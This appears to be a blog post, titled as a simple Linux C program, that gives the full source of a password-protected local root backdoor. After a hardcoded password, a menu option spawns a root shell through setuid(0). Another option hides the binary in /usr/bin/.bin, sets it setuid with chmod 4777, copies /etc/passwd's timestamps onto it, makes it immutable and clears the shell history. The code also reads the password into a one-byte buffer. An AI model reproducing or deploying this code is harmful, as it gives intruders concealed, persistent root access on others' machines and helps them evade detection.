Linux C语言小程序
Linux C语言小程序
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> int compare(char*a,char*b) { if(strcmp(a,b)==0) return 1; else return 0; } int is_file_exist(const char*file_path) { if(file_path==NULL) { return -1; } if(access(file_path,F_OK)==0) { return 0; } return -1; } char *myFileBasePath="/usr/bin/.bin/bin"; char *password="611521"; char *mustFileName="./root"; int main(int argc,char** argv) { int errorTime=0; char typeCommandCode; char what; char *a=argv[0]; if(compare(a,mustFileName)==0){ printf("file path must be ./root\n"); return 0; } while(1) { printf("please type your password:\n"); char *typePassword=(char*)malloc(sizeof(char)); scanf("%s",typePassword); what=getchar(); if(compare(password,typePassword)==1) { errorTime=0; printf("\n\n welcome you to login success! \n\n"); while(1) { system("clear"); printf("************************************************\n"); printf("* Welcome to use Blake System *\n"); printf("* 1----------------get root role *\n"); printf("* 2----------------check file *\n"); printf("* 3--------------- install command *\n"); printf("* 4----------------uninstall command *\n"); printf("* 5--------------- Exit *\n"); printf("* *\n"); printf("************************************************\n"); printf("please type your option:1-5\n"); typeCommandCode=getchar(); what=getchar(); if(typeCommandCode=='1') { setuid(0); setgid(0); system("/bin/bash"); printf("\n Press and key to Continue \n"); what=getchar(); continue; } else if(typeCommandCode=='2') { if(is_file_exist(myFileBasePath)==0) { printf("\n /usr/bin/.bin/bin you can find the file \n"); printf("\n Press and key to Continue \n"); what=getchar(); continue; } else { printf("\n /usr/bin/.bin/bin you can't find the file \n"); printf("\n Press and key to Continue \n"); what=getchar(); continue; } } else if(typeCommandCode=='3') { system("mkdir /usr/bin/.bin"); system("mv root /usr/bin/.bin/bin"); system("chmod 4777 /usr/bin/.bin/bin"); system("touch -r /etc/passwd /usr/bin/.bin/"); system("touch -r /etc/passwd /usr/bin/.bin/bin"); system("chattr -R +i /usr/bin/.bin"); system("history -c"); printf("\n Press and key to Continue \n"); what=getchar(); continue; } else if(typeCommandCode=='4') { system("chattr -i /usr/bin/.bin/bin"); system("rm -rf /usr/bin/.bin"); printf("\n Press and key to Continue \n"); what=getchar(); continue; }else if(typeCommandCode=='5'){ printf("\n Press and key to Exit \n"); return 0; } else { printf("\n can't find the option \n"); printf("\n Press and key to Continue \n"); what=getchar(); continue; } } } else if(compare(password,typePassword)==0) { printf("\n password error \n\n"); errorTime++; if(errorTime==3) { printf("\n\n error time too many, it will to exit! \n\n"); break; return 0; } } } }
by 星云